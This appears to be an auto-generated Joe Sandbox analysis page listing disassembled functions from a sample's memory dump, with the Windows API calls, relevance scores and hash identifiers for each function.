Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: a816a90880890d7fd157fe7e013ae47586bdad1b0bea5581488ccc36810e8496
Instruction ID: f3bb10a94922a2cadd6974cd5a5091be4c315da861a7c4a80407fdb098255a29
Opcode Fuzzy Hash: a816a90880890d7fd157fe7e013ae47586bdad1b0bea5581488ccc36810e8496
Instruction Fuzzy Hash: C5516AB5A10219EFCB14CF68C894AAAB7F9FF89310B158559F909DB350E734E911CFA0

Function 00978AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00978BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00978BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00978C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00978C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00978C5F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 37423f3b3d7f490e12d74efcc36467297e4e9912780fb40ee49bc24b63aef514
Instruction ID: a87aec832b976972d7c2e534ef4ec1d98d86f769adf3869a7063525eceef7fb0
Opcode Fuzzy Hash: 37423f3b3d7f490e12d74efcc36467297e4e9912780fb40ee49bc24b63aef514
Instruction Fuzzy Hash: 7D514E75A002199FCB05DF64C885AAEBBF5FF48314F08C459E849AB3A2DB35ED51CB90

Function 00988EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00988F40
GetProcAddress.KERNEL32(00000000,?), ref: 00988FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00988FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00989032
FreeLibrary.KERNEL32(00000000), ref: 00989052

Part of subcall function 0091F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00971043,?,7529E610), ref: 0091F6E6
Part of subcall function 0091F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0095FA64,00000000,00000000,?,?,00971043,?,7529E610,?,0095FA64), ref: 0091F70D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 7c050f41c956155068f2281ea46d158219095653b17c8fec1020f9ccb0d8de75
Instruction ID: 67d1b3cbe7cae605577e676649e1a98ae55219707bc058fb53ca3868d26a57b2
Opcode Fuzzy Hash: 7c050f41c956155068f2281ea46d158219095653b17c8fec1020f9ccb0d8de75
Instruction Fuzzy Hash: B8516E35605205DFC711EF58C4849AEBBF5FF49314B488099E91AAB362DB31ED86CF90

Function 00996B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00996C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00996C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00996C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0097AB79,00000000,00000000), ref: 00996C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00996CC7

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 031b7438ff9063d409aebd5622f876928ca53a3c2662a653dccf830bcacdca98
Instruction ID: 15dae02c4e6cb6b091de8301dd3dd8b6c559b8697cbc387f4baf2eec4a28bcb6
Opcode Fuzzy Hash: 031b7438ff9063d409aebd5622f876928ca53a3c2662a653dccf830bcacdca98
Instruction Fuzzy Hash: 2841D435A08104AFDF24CF6CCC58FA97BA9EB09350F150229FAD9A72E0E371ED41DA50

Function 00932051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009320C3
_free.LIBCMT ref: 009320E3

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1d39f7da812340bf80a2ae18ae84a033c67db951f38c4b66ac64b693d57f168c
Instruction ID: 4c444a254cfbb668a72fb77e94158fc53c0e04f1f983a24ebe59de58d54df818
Opcode Fuzzy Hash: 1d39f7da812340bf80a2ae18ae84a033c67db951f38c4b66ac64b693d57f168c
Instruction Fuzzy Hash: 0A41B172A00204AFCB24DFB8C981A5EB7F5EF89714F1545A9E616EB391DA31AD01DB80

Function 0091912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00919141
ScreenToClient.USER32(00000000,?), ref: 0091915E
GetAsyncKeyState.USER32(00000001), ref: 00919183
GetAsyncKeyState.USER32(00000002), ref: 0091919D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: f0fd7cb4dce04aa02096a9a47499379b283168118353d86eed946212d61651e2
Instruction ID: 3a29727f7b55fa624a50184de4a01304ca94c8bd28ef39233c56ed151cf8ec36
Opcode Fuzzy Hash: f0fd7cb4dce04aa02096a9a47499379b283168118353d86eed946212d61651e2
Instruction Fuzzy Hash: 9D419071A0C60ABBDF05DFA9D858BEEF774FB05321F204615E825A32D0C7346A94CB51

Function 00973874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 009738CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00973922
TranslateMessage.USER32(?), ref: 0097394B
DispatchMessageW.USER32(?), ref: 00973955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00973966

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 4ae22fd25af9e85080ca3332cb6ec6a5ef742170bb90ef4394eccbc609c3af35
Instruction ID: e6b870b64fbd662f54d322c5c1c1685ac5be6958bd866031bc394ca526513bad
Opcode Fuzzy Hash: 4ae22fd25af9e85080ca3332cb6ec6a5ef742170bb90ef4394eccbc609c3af35
Instruction Fuzzy Hash: 2631C672559341EFEB39CB749C48BB677ACAB05300F04C56AE56A821A0E3B49AC4FB11

Function 0097CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0097C21E,00000000), ref: 0097CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0097CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0097C21E,00000000), ref: 0097CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0097C21E,00000000), ref: 0097CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0097C21E,00000000), ref: 0097CFF2

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 40a3b325eb0002034b83cd666662472cc6aa7d338906a25202f304f4baf42829
Instruction ID: 7ec0a12f3e38f58867081ed2c811dc3a1d49fc0640eaccb4c5168894c7a9900a
Opcode Fuzzy Hash: 40a3b325eb0002034b83cd666662472cc6aa7d338906a25202f304f4baf42829
Instruction Fuzzy Hash: 9B314FB2604609EFDB20DFA5D884AAFBBFDEB54351B10842EF51AD2141D730EE419B60

Function 00961901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00961915
PostMessageW.USER32(00000001,00000201,00000001), ref: 009619C1
Sleep.KERNEL32(00000000,?,?,?), ref: 009619C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 009619DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 009619E2

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: bc370d8d633365671ef2d6f0e6842b5782cd2ce2913e74147b778a6c5d01579d
Instruction ID: 9fa170013fa0a0fb5228946d38f51ddb6c44c3e3aaf81c12e9a4910225fcce1e
Opcode Fuzzy Hash: bc370d8d633365671ef2d6f0e6842b5782cd2ce2913e74147b778a6c5d01579d
Instruction Fuzzy Hash: 1831C071A00219EFCB10CFACDD99ADE3BB9EB44315F14422AF921A72D1C7709944DB90

Function 00995706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00995745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0099579D
_wcslen.LIBCMT ref: 009957AF
_wcslen.LIBCMT ref: 009957BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00995816

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: b374224daff88e5ebfc222dabab68664a76595b02f92a3796b4e3305e73183ef
Instruction ID: 8aa5cfae0dc50307f0e08f36418137a292960bc3affebc518012070b1ffd5300
Opcode Fuzzy Hash: b374224daff88e5ebfc222dabab68664a76595b02f92a3796b4e3305e73183ef
Instruction Fuzzy Hash: E621D271904618AADF219FA9CC84AEE77BCFF44721F108216E929EA184D7708A85CF50

Function 00980930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00980951
GetForegroundWindow.USER32 ref: 00980968
GetDC.USER32(00000000), ref: 009809A4
GetPixel.GDI32(00000000,?,00000003), ref: 009809B0
ReleaseDC.USER32(00000000,00000003), ref: 009809E8

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: d4ce142f5b53b73e3054508366421980279d1796acc596dbb1447c3daf0d413b
Instruction ID: a5fd0a3b448892314973248c3e0619f83c8b52b1ee9348607c0a5484d25cb62d
Opcode Fuzzy Hash: d4ce142f5b53b73e3054508366421980279d1796acc596dbb1447c3daf0d413b
Instruction Fuzzy Hash: A8219376604204AFD714EF69CC84AAEBBF9EF88740F048469F85AD7362DB30AC44DB50

Function 0093CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0093CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0093CDE9

Part of subcall function 00933820: RtlAllocateHeap.NTDLL(00000000,?,009D1444,?,0091FDF5,?,?,0090A976,00000010,009D1440,009013FC,?,009013C6,?,00901129), ref: 00933852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0093CE0F
_free.LIBCMT ref: 0093CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0093CE31

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: c159e0ec6c0211b539e316e2f85c0f53ad5cefcbc82de9e1206878025c1eba55
Instruction ID: cab80b88d2c00da812e85234f8cfb2df72199f0ceaa3a6a0becea88b501429a2
Opcode Fuzzy Hash: c159e0ec6c0211b539e316e2f85c0f53ad5cefcbc82de9e1206878025c1eba55
Instruction Fuzzy Hash: D601F7F2605A157F233126BA6C8CD7B7A6DDEC6BA1B15012AFD05E7201EA618D019BB0

Function 0091990C Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009198CC
SetTextColor.GDI32(?,?), ref: 009198D6
SetBkMode.GDI32(?,00000001), ref: 009198E9
GetStockObject.GDI32(00000005), ref: 009198F1
GetWindowLongW.USER32(?,000000EB), ref: 00919952

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: a1bfe250671aeb0d531ab5b9df384bfcdbcdd4e6aeaa53a05eec2e14d54866dc
Instruction ID: fad8a99b0149c4f43a6d46adc00ce7160afa2570f90700705809eb3a6c4026eb
Opcode Fuzzy Hash: a1bfe250671aeb0d531ab5b9df384bfcdbcdd4e6aeaa53a05eec2e14d54866dc
Instruction Fuzzy Hash: D121383178D2449FCB268F38FC68AE93B649B13331B08025EF5928A1F1C7314981DB51

Function 00919639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00919693
SelectObject.GDI32(?,00000000), ref: 009196A2
BeginPath.GDI32(?), ref: 009196B9
SelectObject.GDI32(?,00000000), ref: 009196E2

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: bc4e2e7ce89ef4c7edd67cb3d82eb18bd93784a66c4549219e81b76963ee9bf2
Instruction ID: f0fe5be1add7910fa946bb9f83f3c247bdbf07271c11da05899f298be56b05db
Opcode Fuzzy Hash: bc4e2e7ce89ef4c7edd67cb3d82eb18bd93784a66c4549219e81b76963ee9bf2
Instruction Fuzzy Hash: EE217172A6A309EBDB11DF68FC287E97B68BB403D5F100217F410961B1D37458D5EBA4

Function 00965711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00965726
_memcmp.LIBVCRUNTIME ref: 00965744
_memcmp.LIBVCRUNTIME ref: 00965757
_memcmp.LIBVCRUNTIME ref: 0096576F
_memcmp.LIBVCRUNTIME ref: 00965787

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 214d85c962193148f84e74927bbdff9a0de7146d2e97583c02f81ef35f15e2c8
Instruction ID: 10e9c32b8c6847290cfaebced4cfd153d3f2a0eef9ce704ede662cb1d3b12ae1
Opcode Fuzzy Hash: 214d85c962193148f84e74927bbdff9a0de7146d2e97583c02f81ef35f15e2c8
Instruction Fuzzy Hash: 2C01D861641619BBD6089514AD92FBBB35D9FB13A8F014030FD08EF645F761EE3082E0

Function 00932DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0092F2DE,00933863,009D1444,?,0091FDF5,?,?,0090A976,00000010,009D1440,009013FC,?,009013C6), ref: 00932DFD
_free.LIBCMT ref: 00932E32
_free.LIBCMT ref: 00932E59
SetLastError.KERNEL32(00000000,00901129), ref: 00932E66
SetLastError.KERNEL32(00000000,00901129), ref: 00932E6F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: e7f8d70c156936cd26c479c5295c44dbd9386b1055fa214db562c693efaa0c35
Instruction ID: 52a0b3478b0e3fa61a0451fe00b22f9750e9b7bb76a3c96b3cc3e5e822a95faf
Opcode Fuzzy Hash: e7f8d70c156936cd26c479c5295c44dbd9386b1055fa214db562c693efaa0c35
Instruction Fuzzy Hash: 960128766496006BC63227797C47F2B2A6DABC13B5F254429F425A22D2EF748C016D20

Function 0096000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0095FF41,80070057,?,?,?,0096035E), ref: 0096002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0095FF41,80070057,?,?), ref: 00960046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0095FF41,80070057,?,?), ref: 00960054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0095FF41,80070057,?), ref: 00960064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0095FF41,80070057,?,?), ref: 00960070

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 3615b025cbb66cead2a7c76573151a32c7933bc1a7e45e91dd6fbe2c78dbeefb
Instruction ID: e8567e2f5417057913ae3f73bf5a03b23f7bde610ca57ab3defdc2279308e2b5
Opcode Fuzzy Hash: 3615b025cbb66cead2a7c76573151a32c7933bc1a7e45e91dd6fbe2c78dbeefb
Instruction Fuzzy Hash: 8901A2B2610204BFDB104F69DC84BAB7AEDEF88791F144125F905D2210D775DD40EBA0

Function 0096E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0096E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0096E9A5
Sleep.KERNEL32(00000000), ref: 0096E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0096E9B7
Sleep.KERNEL32 ref: 0096E9F3

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
